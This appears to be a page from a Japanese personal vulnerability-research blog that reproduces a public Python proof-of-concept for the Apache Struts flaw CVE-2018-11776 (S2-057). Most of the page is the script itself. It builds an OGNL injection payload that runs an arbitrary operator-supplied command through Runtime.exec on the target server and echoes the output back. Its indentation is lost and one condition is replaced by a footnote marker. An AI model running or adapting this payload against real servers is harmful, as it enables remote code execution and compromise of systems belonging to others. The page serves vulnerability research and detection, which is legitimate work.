TT 脆弱性 Blog

脆弱性情報に関する「個人」の調査・研究のログ

トップ > 脆弱性: CVE-2018-11776 > quick-scripts/s2-057.py

quick-scripts/s2-057.py

脆弱性: CVE-2018-11776 *Exploit Code / PoC

【公開情報】

◆pr4jwal/quick-scripts (pr4jwal, 2018/08/26)
https://github.com/pr4jwal/quick-scripts/blob/master/s2-057.py


【Expoit Code】

import requests
import optparse
import sys
import time
requests.packages.urllib3.disable_warnings()
# Usage python s2-057.py -u http://localhost:8080 -t /struts3-showcase/ -c calc
# This script is created for detection and POCing the vulnerability.
# Prajwal's script to check for s2-057, CVE-2018-11776 based on payloads provided by jas502n (https://github.com/jas502n/St2-057)

def zeroday_check(tgtURL, tgtPATH, tgtCMD):
urlcheck = tgtURL+""+tgtPATH
print "[+] Checking Vulnerability: "+urlcheck
command = tgtCMD
payload = "%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec("+command+").getInputStream()%2c%23b%3dnew%20java.io.InputStreamReader(%23a)%2c%23c%3dnew %20java.io.BufferedReader(%23b)%2c%23d%3dnew%20char%5b51020%5d%2c%23c.read(%23d)%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23sbtest.println(%23d)%2c%23sbtest.close())%7d/actionChain1.action"
resp = requests.get(urlcheck+payload, verify=False)
time.sleep(1)
print str(resp.status_code) + " "+urlcheck+ " !"
if resp.status_code == 302:
print "[+] "+tgtURL+ "is likely vulnerable"

def main():
parser = optparse.OptionParser('python %prog -u -t -c command')
parser.add_option('-u','--url', dest = 'URLstrut', help ='give the URL eg., http://www.exampe.com or 127.0.0.1:8080')
parser.add_option('-t', dest = 'tgtPATH', type="string", help ='eg.,/struts3-showcase/ or /struts3-showcase/ ')
parser.add_option('-c', dest = 'tgtCMD', type="string", help ='eg., cmd, calc, ls')
(options,args) = parser.parse_args()
print "[+] Struts String injection started "
tgtURL = options.URLstrut
tgtPATH = options.tgtPATH
tgtCMD = options.tgtCMD
if*1:
print parser.usage
sys.exit(0)
if(requests.get(tgtURL+""+tgtPATH, verify=False).status_code==200):
zeroday_check(tgtURL, tgtPATH, tgtCMD)
else:
print "[-] Check the Target URL and Path"
print "[+] Script complete"

if __name__ == "__main__":
main()

*1:tgtURL == None) | (tgtPATH == None) | (tgtCMD == None

Copyright (C) 谷川哲司 (Tetsuji Tanigawa) 2006 - 2022